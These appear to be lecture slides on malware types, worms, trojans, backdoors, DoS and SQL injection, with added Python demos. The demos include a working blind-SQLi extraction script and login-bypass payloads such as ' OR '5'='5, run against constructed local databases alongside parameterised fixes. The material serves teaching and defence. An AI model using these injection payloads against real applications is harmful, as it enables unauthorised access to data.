• A virus is simply a computer program: it can do anything that any other program you run on your computer can do. Some viruses are designed to deliberately damage files, and others may just spread to other computers.
Common Signs of Computer Viruses
1. Speed of system
2. Pop-up windows
3. Programs self-executing
4. Accounts being logged out
5. Crashing of the device
6. Mass emails being sent from your email account
7. Changes to your homepage
Types of Computer Viruses
 1. Resident virus
 2. Multipartite virus
 3. Direct action
 4. Browser hijacker
 5. Overwrite virus
 6. Web scripting virus
 7. File infector
 8. Network Virus
 9. Macro Virus
 10. Boot Sector Virus
 11. Encrypted Virus
 Resident Virus: A resident virus loads itself into the computer's
 memory (RAM) and stays active after the infected program exits, so it
 can infect other files as they are opened or copied. It is considered
 one of the most troublesome types because it can attach itself to the
 files of antivirus software and corrupt them too.
Examples − Meve, CMJ and Randex.
 Multipartite Virus: A multipartite virus infects executable files
 and the system boot sector at the same time, so it can spread in more
 than one way and re-infect a machine if only one of the two is
 cleaned. It affects multiple parts of the system, namely memory,
 files and the boot record.
Examples − Invader and Flip
 Direct Action: A direct action virus does not stay resident in
 memory. It runs when the infected program is executed, infects
 programs in the same directory or in the paths listed in
 autoexec.bat, and then returns control to the host program. It
 typically degrades system performance but is capable of destroying
 all data on the computer's hard disk and any USB device attached
 to it.
 Browser Hijacker: A browser hijacker changes the settings of web
 browsers, such as replacing the homepage, editing the new tab page,
 and changing the default search engine. Technically it is not a
 virus because it cannot infect files, but it can be hugely damaging
 to computer users, who often will not be able to restore their
 homepage or search engine. Browser hijackers typically come bundled
 with free software and malicious applications from unverified
 websites or app stores.
 Overwrite Virus: Overwrite viruses are extremely dangerous. They
 delete data and replace it with their own file content or code. Once
 a file is infected its original contents cannot be recovered, and the
 virus can affect Windows, DOS, Linux, and Apple systems. The only
 way to remove it is to delete every file it has infected, which can
 be devastating.
 Web Scripting Virus: A web scripting virus attacks web browser
 security, enabling an attacker to inject web pages with malicious
 code, or client-side scripting. This allows cyber criminals to
 attack major websites, such as social networking sites, email
 providers, and any site that accepts user input or reviews.
 Attackers can use the virus to send spam, commit fraud, and damage
 server files.
 File Infector Virus: This type of virus infects the system by
 appending itself to the end of an executable file. It changes the
 start of the program so that control jumps to the virus code first;
 after the virus code runs, control returns to the original program,
 so the execution is not even noticed. It is also called a parasitic
 virus because it lives inside a host file while leaving the host
 functional.
 Network Virus: Network viruses are extremely dangerous because they
 can completely cripple entire computer networks. They are often
 difficult to discover, as the virus could be hidden within any
 computer on an infected network. These viruses replicate and spread
 by using the network (including the internet) to reach other
 connected devices.
 Macro Virus: Unlike most viruses, which are written in a
 low-level language (such as C or assembly), macro viruses are
 written in the macro language of an application, such as Visual
 Basic for Applications. They are triggered when a program capable of
 executing a macro opens the infected document. For example, macro
 viruses can be contained in spreadsheet or word-processor files.
 Boot Sector Virus: It infects the boot sector of the system disk,
 so it executes every time the system is booted and before the
 operating system is loaded. It also infects other bootable media
 such as floppy disks. These are sometimes called memory viruses
 because they load into memory at boot time rather than infecting
 files in the file system.
 Encrypted Virus : In order to avoid detection by
antivirus, this type of virus exists in encrypted
form. It carries a decryption algorithm along with
it. So the virus first decrypts and then executes.
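The following is an added example, not code from the slides, showing why an encrypted virus body defeats a naive byte-signature scanner. The "payload", the XOR keys and the signature string are all constructed for the demonstration; nothing is executed, the body is only bytes that get encrypted, scanned and decrypted.

```python
# Added example: a harmless stand-in for an "encrypted virus". The body is
# stored XOR-encrypted behind a tiny clear-text stub (key length + key); a
# signature scanner sees only the encrypted bytes, and two copies made with
# different keys look nothing alike. All data below is constructed.

# Constructed "malicious" body and the byte pattern an AV engine might hold for it.
PLAIN_BODY = b"fake payload: would delete files here (demo only)"
SIGNATURE = b"would delete files"


def xor_crypt(data: bytes, key: bytes) -> bytes:
    """XOR with a repeating key; applying it twice restores the input."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def build_sample(key: bytes) -> bytes:
    """Assemble one 'infection': 1-byte key length, the key, then the
    encrypted body. A real virus carries a decryptor routine; here the stub
    is only the data that routine would need."""
    return len(key).to_bytes(1, "big") + key + xor_crypt(PLAIN_BODY, key)


def run_stub(sample: bytes) -> bytes:
    """What the decryptor does at run time: read the key, decrypt the body."""
    klen = sample[0]
    key = sample[1:1 + klen]
    return xor_crypt(sample[1 + klen:], key)


def signature_scan(blob: bytes, signatures) -> bool:
    """Static byte-pattern scan, the way a simple AV engine checks a file."""
    return any(sig in blob for sig in signatures)


def demo() -> dict:
    """Scan two copies made with different keys, before and after decryption."""
    key_a, key_b = bytes([0x5A, 0xC3, 0x17]), bytes([0x81, 0x2E])
    sample_a, sample_b = build_sample(key_a), build_sample(key_b)
    return {
        "static_hit_on_encrypted": signature_scan(sample_a, [SIGNATURE]),  # False
        "copies_differ": sample_a != sample_b,                              # True
        "decrypted_hit": signature_scan(run_stub(sample_a), [SIGNATURE]),  # True
        "body_recovered": run_stub(sample_b) == PLAIN_BODY,                 # True
    }


if __name__ == "__main__":
    print(demo())
```

The keys contain bytes with the high bit set, so at least every second or third encrypted byte is non-ASCII and an ASCII signature can never line up with the ciphertext. That is exactly why scanners must either emulate the decryptor or match on the (much smaller) clear-text stub instead of the body.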
How To Prevent Your Computer From
Viruses
 1. Use a trusted antivirus product
 2. Avoid clicking pop-up advertisements
 3. Scan your email attachments
 4. Scan the files that you download using file-
sharing programs
Worms
 A computer worm is a malicious program that replicates itself and
 spreads through a network automatically, without needing a host file
 or user action. A worm exploits vulnerabilities in operating systems,
 network services or applications to steal sensitive information,
 install backdoors that can be used to access the system, corrupt
 files, and do other kinds of harm.
 Is a worm a virus?
 No. A worm is not a virus, although like a virus it can severely
 disrupt IT operations and cause data loss. What makes a worm more
 dangerous is that once it infects a vulnerable machine it can
 self-replicate and spread automatically across many devices with no
 one having to open or run anything.
Worms
 Most common ways a worm spreads
• Email: Email attachments remain popular hiding spots for
worms.
• Networks: Worms can self-propagate across connected
networks.
• System vulnerabilities: Some worms are specifically coded
to take advantage of operating system and software
vulnerabilities.
• File sharing: Peer-to-peer (P2P) file networks can carry
malware like worms.
• Instant messaging (IM): Worms can spread through instant
messaging platforms such as Internet Relay Chat (IRC).
Classifications and Names of
Worms
Email Worms: As the name suggests, an email worm spreads via email. Also known
as a mass-mailer worm, an email worm distributes a copy of itself as
an email attachment or as a link to an infected file on a compromised
or attacker-owned website.
File-Sharing Worms: File-sharing worms embed and disguise themselves as innocent
media files. When an unsuspecting user downloads the file, the
worm infects their device. Once the worm has compromised the
device, it can capture confidential information that the adversary can
use to their advantage or sell to other attackers.
IM Worms: IM worms masquerade as attachments and links on social media
platforms, and they frequently include content that baits the victim
to click on the URL. Once it is executed, the IM worm can spread
through an instant messaging network.
Cryptoworms: A cryptoworm is a worm attack that encrypts
data on the victim's system and then demands
a ransom payment to regain access to the data.
IRC Worms: An IRC worm is a malicious program designed to
exploit IRC channels to infect chat rooms and
message forums by sending infected messages.
P2P Worms: P2P worms use the mechanisms of P2P
networks to distribute copies to unsuspecting
P2P users.
Classifications and Names of
Worms
 Morris
 In 1988, Cornell graduate student Robert Morris released the
 Morris worm (launched from an MIT system), which increased the
 load on over 6,000 UNIX machines across the country, causing
 them to crash. Although Morris' intentions were not malicious,
 the worm caused between $100,000 and $10 million in
 damage. It also resulted in the first felony conviction in the U.S.
 under the 1986 Computer Fraud and Abuse Act.
 SQL Slammer
 SQL Slammer is a 2003 computer worm that caused a denial of
service on some internet hosts, delayed general internet
traffic, and crashed routers all around the world. It spread
quickly, infecting the vast majority of its 75,000 victims within
10 minutes.
 Mydoom
 Mydoom is a computer worm that targets Windows
computers and is regarded as one of the most rapidly
spreading worms in history, infecting millions of machines
since its release in 2004. Mydoom caused an estimated
damage of $38 billion in 2004, and the worm is still around
today, accounting for 1% of all malicious emails.
 Storm Worm
 Debuting in 2007, the Storm Worm attacked millions of
computers using an email about a recent weather disaster
in Europe, baiting recipients with a doomsday subject line:
“230 dead as storm batters Europe.”
 Duqu
 Duqu is a sophisticated computer worm that was first
 discovered in 2011. It is thought to have been
 produced by the same people who created the
 Stuxnet worm, which damaged the centrifuges of Iran's uranium
 enrichment programme in 2010. Duqu's driver was signed with a
 stolen but valid code-signing certificate, and the worm collects
 information that could be useful in attacking industrial control
 systems.
Signs of a worm infection
• Slow system performance stemming from high CPU
resource usage
• Hidden or missing files and folders
• Emails sent to your contacts without your awareness
• Computer programs crashing without warning
• Mysterious files or programs that you didn’t install on the
computer
• Programs running or websites launching automatically
• Unusual browser performance or program behavior
Prevention
• Use endpoint protection software
• Implement employee awareness training
• Use DNS filtering
• Update software and patch systems
Trojan Horse
 A Trojan horse (often loosely called a "Trojan virus") is a type of
 malware that is downloaded onto a computer disguised as a legitimate
 program. The attacker typically uses social engineering to hide
 malicious code inside apparently legitimate software, so that the
 user installs it and, with it, gives the attacker access to the
 system.
 A simple way to answer the question "what is a Trojan" is that it is
 a type of malware that typically arrives hidden as an
 attachment in an email or a free-to-download file and is then
 transferred onto the user's device. Once run, the
 malicious code will execute the task the attacker designed it
 for, such as gaining backdoor access to corporate systems, spying
 on users' online activity, or stealing sensitive data.
How Does Trojan Horse Work?
 Unlike computer viruses, a Trojan horse does not replicate or
 spread by itself, so it needs a user to download and run it. The
 executable (.exe) file must be launched and the program installed
 before the Trojan can attack the device's system.
 A Trojan typically spreads through legitimate-looking emails
 and files attached to emails, which are spammed to reach
 the inboxes of as many people as possible. When the email
 is opened and the malicious attachment is run,
 the Trojan installs itself and runs automatically every
 time the infected device is turned on.
How Does Trojan Horse Work?
 A computer infected by Trojan malware can also spread it
to other computers. A cyber criminal turns the device
into a zombie computer, which means they have remote
control of it without the user knowing. Hackers can then
use the zombie computer to continue sharing malware
across a network of devices, known as a botnet.
 Trojans can also attack and infect smartphones and
 tablets using mobile variants of the malware. This could occur
 through the attacker redirecting the traffic of a device on a
 Wi-Fi network to a malicious download and then using the infected
 device to launch further cyberattacks.
Types of Trojan Malware
1. Exploit Trojan: An exploit malware program contains code or data that takes
advantage of specific vulnerabilities within an application or computer system. The
cyber criminal will target users through a method like a phishing attack, then use the
code in the program to exploit a known vulnerability.
2. Downloader Trojan: A downloader Trojan targets a computer that has already been
infected by malware, then downloads and installs more malicious programs to it. This
could be additional Trojans or other types of malware like adware.
3. Ransom Trojan: Ransom Trojans seek to impair a computer's performance or block
access to data on the device so that the user can no longer use it. The attacker
then holds the user or organization to ransom until they pay a fee to undo the
damage or unlock the affected data.
4. Distributed Denial of Service (DDoS) attack Trojan: These Trojan programs carry out
attacks that overload a network with traffic. It will send multiple requests from a
computer or a group of computers to overwhelm a target web address and cause a
denial of service.
Types of Trojan Malware
5. Fake AV Trojan: A fake antivirus Trojan simulates the actions of legitimate
antivirus software. The Trojan is designed to detect and remove threats like a
regular antivirus program, then extort money from users for removing threats
that may be nonexistent.
6. Rootkit Trojan: A rootkit is a type of malware that conceals itself on a user’s
computer. Its purpose is to stop malicious programs from being detected, which
enables malware to remain active on an infected computer for a longer period.
7. SMS Trojan: An SMS Trojan infects mobile devices and is capable of sending
and intercepting text messages. This includes sending messages to premium-rate
phone numbers, which increases the costs on a user’s phone bill.
8. Banking Trojan or Trojan Banker: A banker Trojan is designed to target users’
banking accounts and financial information. It attempts to steal account data for
credit and debit cards, e-payment systems, and online banking systems.
9. Trojan GameThief: A game-thief Trojan is specifically designed to steal user
account information from people playing online games.
Types of Trojan Malware
10. Backdoor Trojan: A backdoor Trojan enables an attacker to
gain remote access to a computer and take control of it using a
backdoor. This enables the malicious actor to do whatever they
want on the device, such as deleting files, rebooting the
computer, stealing data, or uploading malware. A backdoor Trojan
is frequently used to create a botnet through a network of zombie
computers.
11. Spy Trojan: Spy Trojans are designed to sit on a user’s
computer and spy on their activity. This includes logging their
keyboard actions, taking screenshots, accessing the applications
they use, and tracking login data.
Uses of Trojan Horse
1. Spy: Some Trojans act as spyware. They are designed to take
data from the victim, such as social networking credentials
(usernames and passwords), credit card details, and more.
2. Creating backdoors: The Trojan makes changes in the victim's
system or device so that other malware, or the cyber criminals
themselves, can get into the device or system later.
3. Zombie: Often the attacker is not interested in the victim's
computer itself; they want to bring it under their control and use
it, for example as part of a botnet.
Backdoor
 A backdoor attack is a way to access a computer system
or encrypted data that bypasses the system's customary
security mechanisms. A developer may create a
backdoor so that an application, operating system (OS)
or data can be accessed for troubleshooting or other
purposes. Attackers make use of backdoors that software
developers install, and they also install backdoors
themselves as part of a computer exploit.
Backdoor
 Backdoors allow the attackers to quietly get into the
system by deceiving the security protocols and gain
administrative access. It is similar to the real-life robbery
in which burglars take advantage of the loopholes in a
house and get a 'backdoor' entry for conducting the theft.
 After gaining high-level administrative privilege, the
cyber attackers could perform various horrendous tasks
like injecting spyware, gaining remote access, hack the
device, steal sensitive information, encrypt the system
through ransomware, and many more.
 Backdoors are originally meant for helping software
developers and testers, so they are not always bad.
Types of Backdoor
 Administrative Backdoor: Sometimes software
 developers intentionally leave a backdoor in the
 program so that in case of any failure or error they can
 easily reach the core of the software's code and quickly
 solve the issue. Such backdoors are called
 administrative backdoors. These deliberate backdoors
 can also help software testers to test the code.
 Though such backdoors are meant to be known only to the
 developers, a skilful attacker can discover one and
 silently use it for their own benefit. So an administrative backdoor
 can be regarded as a type of loophole in the program.
Types of Backdoor
 Malicious Backdoor: Malicious Backdoors are
the backdoors installed on the system by
cybercriminals using malware programs
like Remote Access Trojan (RAT). These are
specifically designed for taking control of the
system or network and conduct malicious tasks.
RAT is a malware program that can reach the
root of the system and install the backdoor. RAT
is generally spread through a malicious program.
Malicious Backdoor
Attacks that are commonly carried out through a malicious backdoor include:
• Cryptojacking occurs when a victim's computing
resources are hijacked to mine
cryptocurrency. Cryptojacking attacks target all sorts of
devices and systems.
• DoS attacks overwhelm servers, systems and networks
with unauthorized traffic so that legitimate users can't
access them.
• Ransomware is malware that prevents users from
accessing a system and the files it contains. Attackers
usually demand payment of a ransom for the resources to
be unlocked.
Malicious Backdoor
• Spyware is malware that steals sensitive information and
relays it to other users without the information owner's
knowledge. It can steal credit card numbers, account
login data and location information. Keyloggers are a
form of spyware used to record a user's keystrokes and
steal passwords and other sensitive data.
• Trojan horse is a malicious program that's often installed
through a backdoor and appears harmless. A backdoor
Trojan includes a backdoor that enables remote
administrative control of a targeted system.
Signs of backdoor attacks
• Unusual network traffic: Observe any unexpected or
unexplained network traffic, especially if it's coming from or
going to unfamiliar IP addresses or domains. Backdoors often
communicate with command-and-control servers, generating
suspicious network activity.
• Unauthorised remote access: If you notice remote access or
control of your systems without your knowledge or approval, it
could signify an exploited backdoor. Unauthorized remote
access tools or sessions should raise immediate suspicion.
• Suspicious system modifications: Backdoors may modify
system configurations, registry keys, or other settings to
maintain persistence and facilitate unauthorized access.
Unexplained changes to system files, processes, or services
could indicate a backdoor's presence.
Signs of backdoor attacks
• Unusual user account activity: Monitor for new user
accounts being created, particularly with elevated privileges,
without authorization. Backdoors may create hidden or
backdoor accounts to gain unauthorized access.
• Antivirus software alerts: Pay attention to any alerts or
warnings from your antivirus or security software, which
may detect and flag backdoor malware or suspicious
activities.
• System performance issues: Backdoors may consume
system resources, leading to performance degradation,
increased CPU or memory usage, or other system
slowdowns.
Signs of backdoor attacks
• Unauthorized data exfiltration: If you notice
unauthorized data transfers or sensitive information
being exfiltrated from your systems, it could be a sign of
a backdoor being used for data theft.
• Strange error messages or log entries: Backdoors may
generate unusual error messages, log entries, or system
notifications that could indicate their presence or
activities.
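The first sign listed above, unusual traffic to an unfamiliar address, is easiest to catch when the backdoor calls its command-and-control server on a fixed timer. The following added example (not from the slides) flags such "beaconing" in a connection log. The log lines, the IP addresses, the record format (Unix timestamp, source, destination, port) and the allow-list of expected destinations are all constructed assumptions for the demo.

```python
# Added example: detecting backdoor beaconing from connection records.
# Format assumed: "<unix_ts> <src_ip> <dst_ip> <dst_port>" per line.
from collections import defaultdict
from statistics import mean, pstdev

# Constructed log: workstation 10.0.0.5 talks to an internal file server at
# irregular times, and also calls an unknown external host every 60 seconds.
LOG = """\
1700000000 10.0.0.5 10.0.0.20 445
1700000060 10.0.0.5 203.0.113.7 443
1700000071 10.0.0.5 10.0.0.20 445
1700000120 10.0.0.5 203.0.113.7 443
1700000133 10.0.0.5 10.0.0.20 445
1700000180 10.0.0.5 203.0.113.7 443
1700000181 10.0.0.5 10.0.0.20 445
1700000240 10.0.0.5 203.0.113.7 443
1700000299 10.0.0.5 10.0.0.20 445
1700000300 10.0.0.5 203.0.113.7 443
1700000360 10.0.0.5 203.0.113.7 443
"""

KNOWN_GOOD = {"10.0.0.20"}   # assumed allow-list of expected destinations


def parse(log: str):
    """Yield (timestamp, src, dst, port) tuples from the constructed format."""
    for line in log.splitlines():
        ts, src, dst, port = line.split()
        yield int(ts), src, dst, int(port)


def beacon_score(timestamps):
    """Coefficient of variation (stdev / mean) of the inter-arrival gaps.
    A value near 0 means a timer is driving the connections, which human
    browsing and normal applications rarely produce. Needs >= 3 gaps."""
    gaps = [b - a for a, b in zip(timestamps, timestamps[1:])]
    if len(gaps) < 3:
        return None
    return pstdev(gaps) / mean(gaps)


def find_beacons(log: str, min_conns: int = 4, max_cv: float = 0.1,
                 known_good=None):
    """Return {(src, dst): (connection_count, cv)} for destinations that are
    not on the allow-list and show a near-constant call-home interval."""
    allow = KNOWN_GOOD if known_good is None else known_good
    seen = defaultdict(list)
    for ts, src, dst, _port in parse(log):
        seen[(src, dst)].append(ts)
    hits = {}
    for key, times in seen.items():
        if key[1] in allow or len(times) < min_conns:
            continue
        cv = beacon_score(sorted(times))
        if cv is not None and cv <= max_cv:
            hits[key] = (len(times), round(cv, 3))
    return hits


if __name__ == "__main__":
    print(find_beacons(LOG))   # {('10.0.0.5', '203.0.113.7'): (6, 0.0)}
```

Real implants add random jitter to the interval, so in practice the `max_cv` threshold is tuned per environment and the score is combined with other signals (destination reputation, byte counts, time of day) rather than used alone. The file-server traffic is not flagged even without the allow-list, because its gaps vary too much.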
Detection and prevention
• Antimalware. Some antimalware software can detect and
prevent a backdoor from being installed.
• Firewalls. Ensure a firewall protects every device on a
network. Application firewalls and web application
firewalls can help prevent backdoor attacks by limiting
the traffic that can flow across open ports.
Steganography
 A steganography technique involves hiding sensitive
 information within an ordinary, non-secret file or
 message, so that its presence is not detected.
 You can use steganography to hide text, video, images,
 or even audio data. Its uses are limited only by the type of
 medium and the author's imagination.
Different Types of Steganography
 1. Text Steganography − Information is hidden inside a text
 file. In one common method the hidden data is encoded in a
 chosen letter of each word (for instance the first letter),
 so that reading those letters in order reveals the message.
 2. Image Steganography − The second type of
 steganography is image steganography, which
 entails concealing data by using an image of a
 different object as a cover. Small changes to pixel intensities
 (for example the least significant bit of each colour value)
 are the key to data concealment in image steganography.
Steganography Examples
• Writing with invisible ink
• Embedding text in a picture (like an artist hiding their
initials in a painting they have done)
• Backward masking a message in an audio file (remember
those stories of evil messages recorded backward on rock
and roll records?)
• Concealing information in either metadata or within a file
header
• Hiding an image in a video, viewable only if the video is
played at a particular frame rate
• Embedding a secret message in the red, green, or blue
channel of an RGB image
DOS
 A denial-of-service (DoS) attack is a type of cyber attack in
 which a malicious actor aims to render a computer or
 other device unavailable to its intended users by
 interrupting the device's normal functioning. DoS attacks
 typically function by overwhelming or flooding a targeted
 machine with requests until normal traffic can no longer be
 processed, resulting in denial of service to additional users.
 A DoS attack is characterized by using a single computer to
 launch the attack.
 A distributed denial-of-service (DDoS) attack is a type of
DoS attack that comes from many distributed sources, such
as a botnet DDoS attack.
How does a DoS attack work?
 DoS attacks typically exploit vulnerabilities in a target’s
network or computer systems. Attackers can use a variety
of methods to generate overwhelming traffic or requests,
including:
1. Flooding the target with a massive amount of data
2. Sending repeated requests to a specific part of the system
3. Exploiting software vulnerabilities to crash the system
How can you tell if a computer is
experiencing a DoS attack?
 While it can be difficult to separate an attack from other
network connectivity errors or heavy bandwidth
consumption, some characteristics may indicate an attack
is underway.
 Indicators of a DoS attack include:
• Atypically slow network performance such as long load
times for files or websites
• The inability to load a particular website such as your web
property
• A sudden loss of connectivity across devices on the same
network
What is the difference between a
DDoS attack and a DoS attack?
The distinguishing difference between DDoS and DoS is
the number of sources and connections used in the attack. Some
DoS attacks, such as "low and slow" attacks like Slowloris,
derive their power from their simplicity and the minimal
resources they need to be effective: a single machine holding
many half-open HTTP connections can exhaust a server's
connection pool.
Prevention
• Cloud Mitigation Provider – Cloud mitigation providers are experts
at providing DDoS mitigation from the cloud. This means they have
built out massive amounts of network bandwidth and DDoS
mitigation capacity at multiple sites around the Internet that can
take in any type of network traffic, whether you use multiple ISP’s,
your own data center, or any number of cloud providers. They can
scrub the traffic for you and only send “clean” traffic to your data
center.
• Firewall – This is the simplest and least effective method against
large attacks, because the firewall itself, or the link in front of it,
can be saturated. Existing enterprise firewalls can be configured to
block traffic from attacking sources, and simple scripts are sometimes
written to filter out malicious traffic.
• Internet Service Provider (ISP) – Some enterprises use their ISP to
provide DDoS mitigation. These ISPs have more bandwidth than an
enterprise would, which can help with large volumetric attacks.
SQL Injection
 SQL injection (SQLi) is a cyberattack that injects
 malicious SQL code into an application, allowing the
 attacker to view or modify a database. According to the
 Open Web Application Security Project (OWASP), injection attacks,
 which include SQL injection, were the third most serious
 web application security risk in 2021. In the applications
 they tested, there were 274,000 occurrences of injection.
SQL Injection
Types of SQL Injections
 SQL injections typically fall under three categories: In-
band SQLi (Classic), Inferential SQLi (Blind) and Out-of-
band SQLi. You can classify SQL injections types based
on the methods they use to access backend data and
their damage potential.
In-band SQLi
 The attacker uses the same channel of communication to
 launch the attack and gather the results. In-band SQLi's simplicity
 and efficiency make it one of the most common types of SQLi attack.
 There are two sub-variations of this method:
• Error-based SQLi—the attacker performs actions that
cause the database to produce error messages. The
attacker can potentially use the data provided by these
error messages to gather information about the structure
of the database.
• Union-based SQLi—this technique takes advantage of the
UNION SQL operator, which combines the result sets of two or more
SELECT statements. The attacker appends their own SELECT to the
application's query so that its results come back in the normal
HTTP response, where they may contain data that can be leveraged
by the attacker.
Inferential (Blind) SQLi
 The attacker sends data payloads to the server and
 observes the response and behavior of the server to
 learn more about its structure. This method is called
 blind SQLi because the data is not transferred from the
 website database to the attacker, thus the attacker cannot
 see information about the attack in-band.
 Blind SQL injections rely on the response and behavioral
 patterns of the server, so they are typically slower to
 execute but may be just as harmful. Blind SQL injections
 can be classified as follows:
Inferential (Blind) SQLi
• Boolean—the attacker sends a SQL query to the database
prompting the application to return a result. The result will
vary depending on whether the injected condition is true or false. Based
on the result, the content of the HTTP response will
change or stay unchanged. The attacker can then work out whether
the condition evaluated to true or false.
• Time-based—attacker sends a SQL query to the database,
which makes the database wait (for a period in seconds) before
it can react. The attacker can see from the time the database
takes to respond, whether a query is true or false. Based on
the result, an HTTP response will be generated instantly or
after a waiting period. The attacker can thus work out if the
message they used returned true or false, without relying on
data from the database.
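To make the boolean-based case concrete, here is an added example (not code from the slides) run against a constructed SQLite database. The "application" only reveals whether a product name exists, yet that single true/false bit is enough to read a value from a different table one character at a time. The table names, the `secret` column, the `-- ` comment sequence and the alphabet are the example's own assumptions.

```python
# Added example: boolean-based blind SQL injection against an in-memory
# SQLite database. Everything here (schema, rows, payloads) is constructed.
import sqlite3
import string


def make_db() -> sqlite3.Connection:
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE products(name TEXT);
        INSERT INTO products VALUES ('lamp'), ('desk');
        CREATE TABLE users(username TEXT, secret TEXT);
        INSERT INTO users VALUES ('admin', 'k9z2');
    """)
    return db


def product_exists(db, name: str) -> bool:
    """The vulnerable endpoint: user input is concatenated into the query and
    the only thing the caller learns is whether a row came back."""
    sql = "SELECT 1 FROM products WHERE name='" + name + "'"
    return db.execute(sql).fetchone() is not None


def oracle_true(db, condition: str) -> bool:
    """One blind probe. The payload makes the WHERE clause true exactly when
    `condition` holds; '-- ' comments out the application's closing quote."""
    payload = "nothing' OR (" + condition + ") -- "
    return product_exists(db, payload)


def extract_secret(db, max_len: int = 16,
                   alphabet: str = string.ascii_lowercase + string.digits) -> str:
    """Recover users.secret for 'admin' character by character. Each position
    costs up to len(alphabet) requests, which is why blind SQLi is slow."""
    secret = ""
    for pos in range(1, max_len + 1):
        sub = f"(SELECT substr(secret,{pos},1) FROM users WHERE username='admin')"
        for ch in alphabet:
            if oracle_true(db, f"{sub}='{ch}'"):
                secret += ch
                break
        else:
            return secret        # no character matched: read past the end
    return secret


if __name__ == "__main__":
    db = make_db()
    print(extract_secret(db))    # k9z2
```

The time-based variant differs only in the oracle: instead of a row/no-row difference it uses a conditional delay (for example `IF(cond, SLEEP(5), 0)` on MySQL, an assumption about the target's dialect) and times the response. Parameterised queries remove both variants, because the quote in the payload is then just data and never closes the string literal.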
Out-of-band SQLi
 The attacker can only carry out this form of attack when
certain features are enabled on the database server
used by the web application. This form of attack is
primarily used as an alternative to the in-band and
inferential SQLi techniques.
 Out-of-band SQLi is performed when the attacker can’t
use the same channel to launch the attack and gather
information, or when a server is too slow or unstable
for these actions to be performed. These techniques
count on the capacity of the server to create DNS or
HTTP requests to transfer data to an attacker.
SQLi attacks can also be classified by
the method they use to inject data:
• SQL injection based on user input – web applications
accept inputs through forms, which pass a user’s input to
the database for processing. If the web application accepts
these inputs without sanitizing them, an attacker can
inject malicious SQL statements.
• SQL injection based on cookies – another approach to SQL
injection is modifying cookies to “poison” database
queries. Web applications often load cookies and use their
data as part of database operations. A malicious user, or
malware deployed on a user’s device, could modify
cookies, to inject SQL in an unexpected way.
SQLi attacks can also be classified by
the method they use to inject data:
• SQL injection based on HTTP headers – server variables such
HTTP headers can also be used for SQL injection. If a web
application accepts inputs from HTTP headers, fake headers
containing arbitrary SQL can inject code into the database.
• Second-order SQL injection – these are possibly the most
complex SQL injection attacks, because they may lie
dormant for a long period of time. A second-order SQL
injection attack delivers poisoned data, which might be
considered benign in one context, but is malicious in another
context. Even if developers sanitize all application inputs,
they could still be vulnerable to this type of attack.
Real-Life SQL Injection Attack Examples
 Breaches Enabled by SQL Injection
• GhostShell attack—hackers from the hacktivist group Team GhostShell
targeted 53 universities using SQL injection, stole and published
36,000 personal records belonging to students, faculty, and staff.
• Turkish government—another hacktivist group, the RedHack collective, used
SQL injection to breach a Turkish government website and erase
debts owed to government agencies.
• 7-Eleven breach—a team of attackers used SQL injection to
penetrate corporate systems at several companies, primarily the 7-
Eleven retail chain, stealing 130 million credit card numbers.
• HBGary breach—hackers related to the Anonymous activist group
used SQL Injection to take down the IT security company’s website.
The attack was a response to HBGary CEO publicizing that he had
names of Anonymous organization members.
Real-Life SQL Injection Attack Examples
 Notable SQL Injection Vulnerabilities
• Tesla vulnerability—in 2014, security researchers publicized that
they were able to breach the website of Tesla using SQL injection,
gain administrative privileges and steal user data.
• Cisco vulnerability—in 2018, a SQL injection vulnerability was
found in Cisco Prime License Manager. The vulnerability allowed
attackers to gain shell access to systems on which the license
manager was deployed. Cisco has patched the vulnerability.
• Fortnite vulnerability—Fortnite is an online game with over 350
million users. In 2019, a SQL injection vulnerability was discovered
which could let attackers access user accounts. The vulnerability
was patched.
SQL Injection Code Examples
Example 1: Using SQLi to Authenticate as Administrator
This example shows how an attacker can use SQL injection
to circumvent an application's authentication and gain
administrator privileges.
Consider a simple authentication system using a database
table with usernames and passwords. A user's POST
request will provide the variables user and pass, and
these are inserted into a SQL statement:
sql = "SELECT id FROM users WHERE username='" + user
+ "' AND password='" + pass + "'"
The problem here is that the SQL statement uses
concatenation to combine data with code. The attacker can
provide a string like this instead of a real password in
the pass variable:
' OR '5'='5
The resulting SQL query will be run against the database:
SELECT id FROM users WHERE username='user' AND
password='' OR '5'='5'
Because '5'='5' is a condition that always evaluates to true, and
AND binds more tightly than OR, the WHERE clause is true for every
row regardless of the username or password provided.
The query will return the first ID from the users
table, which is commonly the administrator. This means the
attacker can access the application without authentication,
and also has administrator privileges.
A more advanced form of this attack is where the attacker
adds a comment sequence at the end of the injected value, so
that whatever the application appends after it is ignored and
the attacker can manipulate the query more freely. The SQL
line comment (-- followed by a space) is understood by MySQL,
PostgreSQL, and Oracle; the block-comment form below is the one
commonly shown for MySQL:
' OR '5'='5' /*
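The following added example (not the slides' code) runs the login query above against a constructed SQLite table, first built by string concatenation exactly as on the slide and then with a parameterised query, so the bypass and its fix can be seen side by side. The user rows, the `login_*` function names and the `?` placeholder style (SQLite's) are assumptions of the example.

```python
# Added example: the slide's authentication query, vulnerable and fixed,
# against a constructed in-memory SQLite database.
import sqlite3


def make_db() -> sqlite3.Connection:
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE users(id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        INSERT INTO users VALUES (1, 'admin', 'hunter2'), (2, 'bob', 'pw');
    """)
    return db


def login_vulnerable(db, user: str, password: str):
    """The slide's query: attacker-controlled text becomes part of the SQL."""
    sql = ("SELECT id FROM users WHERE username='" + user +
           "' AND password='" + password + "'")
    row = db.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(db, user: str, password: str):
    """Same query with placeholders. The driver sends the values separately
    from the statement text, so a quote inside them is only a quote."""
    sql = "SELECT id FROM users WHERE username=? AND password=?"
    row = db.execute(sql, (user, password)).fetchone()
    return row[0] if row else None


def demo() -> dict:
    """Run the slide's payloads through both versions of the login."""
    db = make_db()
    bypass = "' OR '5'='5"            # the always-true payload from the slide
    comment = "' OR '5'='5' -- "      # same idea; the comment swallows the rest
    return {
        "vuln_bypass": login_vulnerable(db, "x", bypass),    # 1, the admin
        "vuln_comment": login_vulnerable(db, "x", comment),  # 1
        "safe_bypass": login_safe(db, "x", bypass),          # None
        "genuine": login_safe(db, "bob", "pw"),              # 2
    }


if __name__ == "__main__":
    print(demo())
```

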